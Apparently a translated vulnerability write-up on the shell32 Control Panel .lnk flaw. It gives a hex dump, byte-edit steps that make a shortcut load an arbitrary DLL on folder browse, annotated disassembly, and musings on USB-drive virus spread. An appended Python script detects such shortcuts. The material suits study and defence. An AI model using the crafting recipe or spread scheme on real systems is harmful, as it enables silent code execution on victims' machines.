How to exploit lnk shortcuts

Source: Internet
Author: User

Preface
Windows shell32 has a vulnerability in the way it processes shortcut (.lnk) files for Control Panel applets: it can be made to load an arbitrary DLL from disk and execute its code.

Vulnerability file generation
Under "Control Panel", right-click "Display" and choose "Create shortcut" to put the shortcut on the desktop. Then open the resulting "Display.lnk" file on the desktop with WinHex.

    Offset    0  1  2  3  4  5  6  7  8  9  A  B  C  D  E  F
    00000000  4C 00 00 00 01 14 02 00 00 00 00 00 C0 00 00 00
    00000010  00 00 00 46 81 00 00 00 00 00 00 00 00 ..
    00000020  00 00 00 00 00 00 00 00 00 00 00 00 00 00 ..
    00000030  00 00 00 00 00 00 00 00 00 00 00 00 00 00 ..
    00000040  00 00 00 00 00 00 00 00 00 00 00 00 CC 00 14 00
    00000050  1F 50 E0 4F D0 20 EA 3A 69 10 A2 D8 08 00 2B 30
    00000060  30 9D 14 00 2E 00 20 20 EC 21 EA 3A 69 10 A2 DD
    00000070  08 00 2B 30 30 9D A2 00 00 00 9C FF 00 00 00 ..
    00000080  00 00 00 6A 00 00 00 00 00 00 1D 00 20 00 44 00
    00000090  3A 00 5C 00 57 00 49 00 4E 00 44 00 4F 00 57 00
    000000A0  53 00 5C 00 73 00 79 00 73 00 74 00 65 00 6D 00
    000000B0  33 00 32 00 5C 00 64 00 65 00 73 00 6B 00 2E 00
    000000C0  63 00 70 00 6C 00 00 00 3E 66 3A 79 00 F4 66 ..
    000000D0  39 65 A8 60 84 76 4C 68 62 97 84 76 16 59 C2 89
    000000E0  0C FF 8B 4F 82 59 CC 80 6F 66 01 30 4F 5C 55 5E
    000000F0  DD 4F A4 62 0B 7A 8F 5E 01 30 9C 98 72 82 01 30
    00000100  57 5B 53 4F 27 59 0F 5C 8C 54 4F 5C 55 5E 06 52
    00000110  A8 8F 87 73 02 30 00 00 00 00 00 00 00 00

Rows ending in ".." are incomplete. Bytes 0x8E to 0xC5 are the UTF-16LE string "D:\WINDOWS\system32\desk.cpl"; the bytes after its terminating NUL are the Chinese description text of the applet.

Change the 9C FF at offset 0x7A to 00 00, and change the file name D:\WINDOWS\system32\desk.cpl to C:\DLL.DLL (in Unicode). Save the file and copy it to any directory. When that directory is browsed, C:\DLL.dll is loaded.

Lnk file format
The target of an .lnk file is stored in the SHITEMID structures of the shell item ID list, which describes the target layer by layer. In the file above, the first layer is

    14 00 1F 50 E0 4F D0 20 EA 3A 69 10 A2 D8 08 00 2B 30 30 9D

where 14 00 is the length and the last 16 bytes are the GUID of "My Computer", {20d04fe0-3aea-1069-a2d8-08002b30309d}, which can be found in the registry. The second layer is

    14 00 2E 00 20 20 EC 21 EA 3A 69 10 A2 DD 08 00 2B 30 30 9D

which carries the GUID of "Control Panel", {21ec2020-3aea-1069-a2dd-08002b30309d}. The third layer is the target file itself, with length 0xA2. The 9C FF at offset 0x7A appears to be the icon index of the shortcut. So the shell item ID list resolves to: My Computer > Control Panel > D:\WINDOWS\system32\desk.cpl. A shortcut to an ordinary file appears to be laid out as: My Computer > drive letter > directory 1 > directory 2 ... > file name.

Where the vulnerability comes from
When shell32 processes the .lnk file it has to display the shortcut's icon. For an ordinary file the icon is resolved from the icon-filename string. A Control Panel shortcut, however, has no icon-filename string structure after the file item, so the icon is taken directly from the icon index at 0x7A. When that icon index is 0, the CPL file is loaded and its CPlApplet interface is called, and the code in the DLL runs.

    7d716064  53                       push ebx
    7d716065  ff75 10                  push dword ptr [ebp+10]
    7d716068  8d5e 0c                  lea ebx, dword ptr [esi+c]
    7d71606b  53                       push ebx
    7d71606c  ff75 0c                  push dword ptr [ebp+c]          ; "C:\DLL.DLL,0" - this 0 is the icon index taken from offset 7A
    7d71606f  ff15 0015597d            call dword ptr [<&kernel32.lstrcpynW>]
    7d716075  6a 2c                    push 2c                         ; ','
    7d716077  ff75 0c                  push dword ptr [ebp+c]
    7d71607a  ff15 f41b597d            call dword ptr [<&shlwapi.StrChrW>]
    7d716080  85c0                     test eax, eax
    7d716082  74 5d                    je short 7d7160e1
    7d716084  66:8320 00               and word ptr [eax], 0
    7d716088  83c0 02                  add eax, 2
    7d71608b  50                       push eax
    7d71608c  ff15 641c597d            call dword ptr [<&shlwapi.StrToIntW>]
    7d716092  8b7d 14                  mov edi, dword ptr [ebp+14]
    7d716095  8907                     mov dword ptr [edi], eax
    7d716097  8b45 18                  mov eax, dword ptr [ebp+18]
    7d71609a  c700 02000000            mov dword ptr [eax], 2
    7d7160a0  8b0f                     mov ecx, dword ptr [edi]
    7d7160a2  33d2                     xor edx, edx
    7d7160a4  3bca                     cmp ecx, edx                    ; the value at offset 7A must be 0 to reach LoadLibrary
    7d7160a6  75 33                    jnz short 7d7160db
    7d7160a8  c700 1a000000            mov dword ptr [eax], 1a
    7d7160ae  8d86 14020000            lea eax, dword ptr [esi+214]
    7d7160b4  3910                     cmp dword ptr [eax], edx
    7d7160b6  8955 0c                  mov dword ptr [ebp+c], edx
    7d7160b9  75 16                    jnz short 7d7160d1
    7d7160bb  8d4d 0c                  lea ecx, dword ptr [ebp+c]
    7d7160be  51                       push ecx
    7d7160bf  8d8e 18020000            lea ecx, dword ptr [esi+218]
    7d7160c5  51                       push ecx
    7d7160c6  50                       push eax
    7d7160c7  53                       push ebx
    7d7160c8  e8 48c4f2ff              call 7d6a2515

    7d63866d  ff15 6415597d            call dword ptr [<&kernel32.GetCurrentProcessId>]
    7d638673  50                       push eax
    7d638674  56                       push esi
    7d638675  68 00001000              push 100000                     ; UNICODE "f1df_6.0.2600.5512_x-ww_35d4ce83\"
    7d63867a  8985 e4fdffff            mov dword ptr [ebp-21c], eax
    7d638680  ff15 6815597d            call dword ptr [<&kernel32.OpenProcess>]
    7d638686  3bc6                     cmp eax, esi
    7d638688  8985 e8fdffff            mov dword ptr [ebp-218], eax
    7d63868e  0f84 e5000000            je 7d638779
    7d638694  8d85 f4fdffff            lea eax, dword ptr [ebp-20c]
    7d63869a  50                       push eax
    7d63869b  ff15 a41c597d            call dword ptr [<&shlwapi.PathFileExistsW>]
    7d6386a1  85c0                     test eax, eax
    7d6386a3  c785 bcfdffff 20000000   mov dword ptr [ebp-244], 20
    7d6386ad  74 14                    je short 7d6386c3
    7d6386af  8d85 f4fdffff            lea eax, dword ptr [ebp-20c]
    7d6386b5  89b5 c0fdffff            mov dword ptr [ebp-240], esi
    7d6386bb  8985 c4fdffff            mov dword ptr [ebp-23c], eax
    7d6386c1  eb 1a                    jmp short 7d6386dd
    7d6386c3  c785 c0fdffff 08000000   mov dword ptr [ebp-240], 8
    7d6386cd  899d c4fdffff            mov dword ptr [ebp-23c], ebx
    7d6386d3  c785 d0fdffff 7b000000   mov dword ptr [ebp-230], 7b
    7d6386dd  8d85 bcfdffff            lea eax, dword ptr [ebp-244]
    7d6386e3  50                       push eax
    7d6386e4  ff15 6c15597d            call dword ptr [<&kernel32.CreateActCtxW>]
    7d6386ea  83f8 ff                  cmp eax, -1
    7d6386ed  8985 f0fdffff            mov dword ptr [ebp-210], eax
    7d6386f3  75 06                    jnz short 7d6386fb
    7d6386f5  89b5 f0fdffff            mov dword ptr [ebp-210], esi
    7d6386fb  8b3d 8c15597d            mov edi, dword ptr [<&kernel32.ActivateActCtx>]
    7d638701  8d85 ecfdffff            lea eax, dword ptr [ebp-214]
    7d638707  50                       push eax
    7d638708  ffb5 f0fdffff            push dword ptr [ebp-210]
    7d63870e  ffd7                     call edi
    7d638710  33f6                     xor esi, esi
    7d638712  46                       inc esi
    7d638713  56                       push esi
    7d638714  56                       push esi
    7d638715  56                       push esi
    7d638716  53                       push ebx
    7d638717  ff15 00f0787d            call dword ptr [7d78f000]       ; apphelp
    7d63871d  85c0                     test eax, eax
    7d63871f  75 08                    jnz short 7d638729
    7d638721  2185 e0fdffff            and dword ptr [ebp-220], eax
    7d638727  eb 0d                    jmp short 7d638736
    7d638729  53                       push ebx                        ; load the DLL
    7d63872a  ff15 a015597d            call dword ptr [<&kernel32.LoadLibraryW>]
    7d638730  8985 e0fdffff            mov dword ptr [ebp-220], eax    ; dll.01C00000

Exploitation
It is said that the virus sample spread through USB flash drives. However, I found that the DLL must be loaded by an absolute path; a relative path cannot be used, so the virus would have to know the drive letter of the USB drive in order to load the DLL from it. I do not know how this problem was solved. I did not study the .lnk file format carefully, so I do not know whether several target addresses can be placed in one file. The only (rather stupid) way I can think of is to create more than 20 .lnk files on the USB drive during infection, one per drive letter, so that one of them always matches the drive letter the USB drive is mounted on. Propagation through shared directories has the same problem. In fact, I do not think this is a real vulnerability: since the icon has to be parsed, loading the corresponding DLL is justified; it just happens to be exploited by viruses.
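For triage of the structure described above, the following is an added example (not code from the original article or from any project it mentions). It parses the LNK header and the LinkTargetIDList, walks the My Computer > Control Panel > item layering, and reports a control-panel shortcut whose icon index is 0, since that is the value that sends shell32 down the LoadLibraryW path shown in the listing. The position of the icon index (a 16-bit value at item offset 4, file offset 0x7A in the dump) and of the UTF-16LE target string are assumptions read off the dump, not a complete [MS-SHLLINK] implementation; build_control_panel_lnk only produces constructed test fixtures, and all function names are mine.

```python
"""Triage helper for control-panel shortcuts whose icon index is 0.

Added example (not from the article). It parses the LNK header and the
LinkTargetIDList, checks the My Computer > Control Panel > item layering,
and flags the case where the icon index at item offset 4 (file offset 0x7A
in the dump) is 0, because that is the value that makes shell32 call
LoadLibraryW on the target to obtain the icon.
"""
import re
import struct
import uuid

LNK_HEADER_SIZE = 0x4C
LNK_CLSID = uuid.UUID("00021401-0000-0000-c000-000000000046")
FLAG_HAS_LINK_TARGET_IDLIST = 0x01      # LinkFlags bit 0 (LinkFlags sit at 0x14)
FLAG_IS_UNICODE = 0x80                  # the dump's flags are 0x81
CLSID_MY_COMPUTER = uuid.UUID("20d04fe0-3aea-1069-a2d8-08002b30309d")
CLSID_CONTROL_PANEL = uuid.UUID("21ec2020-3aea-1069-a2dd-08002b30309d")
# Assumed layout of the control-panel item, read off the dump: the icon index
# is the 16-bit value at item offset 4 and the UTF-16LE text follows it.
CPL_ICON_INDEX_OFFSET = 4
CPL_TEXT_OFFSET = 6


def parse_item_ids(data):
    """Return the ItemID byte strings of the LinkTargetIDList (empty if absent)."""
    if (len(data) < LNK_HEADER_SIZE
            or struct.unpack_from("<I", data, 0)[0] != LNK_HEADER_SIZE
            or data[4:20] != LNK_CLSID.bytes_le):
        raise ValueError("not an LNK file")
    flags = struct.unpack_from("<I", data, 0x14)[0]
    if not flags & FLAG_HAS_LINK_TARGET_IDLIST:
        return []
    (idlist_size,) = struct.unpack_from("<H", data, LNK_HEADER_SIZE)
    pos = LNK_HEADER_SIZE + 2
    end = min(pos + idlist_size, len(data))
    items = []
    while pos + 2 <= end:
        (size,) = struct.unpack_from("<H", data, pos)
        if size == 0:                       # TerminalID ends the list
            break
        if size < 2 or pos + size > end:
            raise ValueError("malformed ItemID at offset 0x%x" % pos)
        items.append(data[pos:pos + size])
        pos += size
    return items


def folder_clsid(item):
    """CLSID of a 0x14-byte virtual-folder item: size(2) type(1) sort(1) GUID(16)."""
    if len(item) != 0x14:
        return None
    return uuid.UUID(bytes_le=bytes(item[4:20]))


def control_panel_target(item):
    """(icon index, target path) of the item below the Control Panel folder."""
    if len(item) < CPL_TEXT_OFFSET:
        return None, None
    (icon_index,) = struct.unpack_from("<h", item, CPL_ICON_INDEX_OFFSET)
    text = item[CPL_TEXT_OFFSET:].decode("utf-16-le", errors="ignore")
    match = re.search(r"[A-Za-z]:\\[^\x00]*", text)
    return icon_index, (match.group(0) if match else None)


def inspect_lnk(data):
    """Classify one .lnk; 'suspicious' means the LoadLibraryW path is reachable."""
    result = {"control_panel": False, "icon_index": None, "target": None,
              "suspicious": False, "reason": ""}
    items = parse_item_ids(data)
    if (len(items) < 3 or folder_clsid(items[0]) != CLSID_MY_COMPUTER
            or folder_clsid(items[1]) != CLSID_CONTROL_PANEL):
        return result                       # ordinary shortcut: drive > dirs > file
    result["control_panel"] = True
    icon_index, target = control_panel_target(items[2])
    result["icon_index"], result["target"] = icon_index, target
    if icon_index == 0:
        result["suspicious"] = True
        result["reason"] = "icon index 0: shell32 loads the target to obtain the icon"
        if target is None or not target.lower().endswith(".cpl"):
            result["reason"] += "; target is not a .cpl file"
    return result


def build_control_panel_lnk(icon_index, target):
    """Constructed test fixture mirroring the dump's layout (not a real shortcut)."""
    header = struct.pack("<I16sI", LNK_HEADER_SIZE, LNK_CLSID.bytes_le,
                         FLAG_HAS_LINK_TARGET_IDLIST | FLAG_IS_UNICODE)
    header += bytes(LNK_HEADER_SIZE - len(header))

    def item(body):
        return struct.pack("<H", len(body) + 2) + body

    my_computer = item(b"\x1f\x50" + CLSID_MY_COMPUTER.bytes_le)
    control_panel = item(b"\x2e\x00" + CLSID_CONTROL_PANEL.bytes_le)
    cpl = item(b"\x00\x00" + struct.pack("<h", icon_index) + bytes(18)
               + target.encode("utf-16-le") + b"\x00\x00")
    idlist = my_computer + control_panel + cpl + b"\x00\x00"   # TerminalID
    return header + struct.pack("<H", len(idlist)) + idlist


if __name__ == "__main__":
    import sys
    for path in sys.argv[1:]:
        with open(path, "rb") as fh:
            print(path, inspect_lnk(fh.read()))
```

Run it as `python lnk_check.py *.lnk` over a removable drive or share. A legitimate Control Panel shortcut that reports its icon through CPlApplet will also carry icon index 0, so the target path and extension in the output are what separate the two cases; anything pointing outside the Windows system directory or at a non-.cpl file deserves a closer look.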
